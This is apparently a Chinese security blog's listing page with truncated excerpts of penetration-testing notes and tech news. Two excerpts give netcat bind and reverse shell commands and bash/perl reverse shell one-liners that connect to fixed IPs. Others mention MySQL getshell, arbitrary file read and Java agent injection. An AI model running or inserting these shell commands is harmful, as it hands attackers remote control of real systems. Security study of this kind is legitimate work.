2024-12-29 厉飞雨 阅读(339) 评论(0) 赞(12)

前言 === 随便记录一下笔记,方便查询.最近是想到什么就记什么. 渗透测试mysql ========= 关于如何攻击mysql请直接看这篇\>[Mysql数据库渗透及漏洞利用总结](https://xz.aliyun.com/t/1491)写的很全 拿shell ====== 1前提需要知道网站的真实**物理路径** 2查看是否允许导入导出 ...

2024-12-29 厉飞雨 阅读(322) 评论(0) 赞(17)

前言 === 刚刚用windows写了个脚本，拿到kali执行发现的问题（还是太垃圾了） 解决 === 用windows系统打开过的文档会被改为dos格式 dos格式：CR LF unix格式：LF 在vim中用\*\*:set ff**查看格式 用** :set ff=unix**和**:set ff=dos\*\*来改变格式

2024-12-29 厉飞雨 阅读(375) 评论(0) 赞(15)

使用 === 正向shell： nc -lvvp 1988 -e /bin/bash nc 10.1.10.2 1988 //攻击鸡 反向shell： nc -e /bin/bash 152.54.56.4 1988 nc -lvvp 1988 //攻击鸡 注...

2024-12-29 厉飞雨 阅读(285) 评论(0) 赞(14)

说明 === 分享一下各种版本的shell写法 bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM...

2024-12-29 厉飞雨 阅读(310) 评论(0) 赞(12)

说明 === 涨姿势的文章日常分享 [通过MySQL LOAD DATA特性来达到任意文件读取](https://xz.aliyun.com/t/3973)

2024-12-29 厉飞雨 阅读(271) 评论(0) 赞(11)

无论客户是否想要，微软都将其 AI 助手 Copilot 整合到其产品中，提供给客户，然后涨价，让客户为 AI 付费。微软最近将 Copilot 集成到了澳大利亚和东南亚国家的订阅服务 Microsoft 365 中，随后提高了订阅价格。用户抱怨 Copilot 就像微软 1990 年代饱受非议的 Clippy 助手一样惹人厌，澳大利亚用户还发现 Microsoft 365 的...

2024-12-29 厉飞雨 阅读(355) 评论(0) 赞(11)

OpenAI 的最大投资者和盟友微软正致力于为其 AI 产品 Microsoft 365 Copilot 引入其它公司的 AI 模型，以实现多元化并降低成本，同时减少对 OpenAI 的依赖。微软发言人对此回应称，OpenAI 仍然是该公司在前沿模型（Frontier Models）上的合作伙伴。微软表示它根据产品和体验整合来自 OpenAI 和微软的各种模型。微软旗下的代码托...

2024-12-28 厉飞雨 阅读(290) 评论(0) 赞(17)

Python代码转换为C代码的时候，将会大大增加框架代码量。 [基础教程 \| Cython 官方文档中文版(gitbooks.io)](https://moonlet.gitbooks.io/cython-document-zh_cn/content/ch1-basic_tutorial.html) 1、正向py-\>c ---------- 先有正向，再有逆向 ...

2024-12-28 厉飞雨 阅读(332) 评论(0) 赞(14)

**JavaAgent技术简介** JDK1.5开始引入了Agent机制(即启动java程序时添加"-javaagen t "参数，Java Agent机制允许用户在JVM加载class文件的时候先加载自己编写的Agent文件，通过修改JVM传入的字节码来实现注入 自定义的代码 。 采用 这种方式 时， 必须在容器启动时添加jvm参数，所以需要重启Web容...

2024-12-28 厉飞雨 阅读(372) 评论(0) 赞(15)

********如果你喜欢我的文章，欢迎关注公众号：安全女巫 转载请注明出处：******** https://mp.weixin.qq.com/s/xEKSXm2-fCHhyvZxrQUQvQ burpsuite 最新版下载地址： 关注公众号回复burpsuite 0x1 前言 ====== 官方只支持三种语言：Java, Python \& Ruby 因B...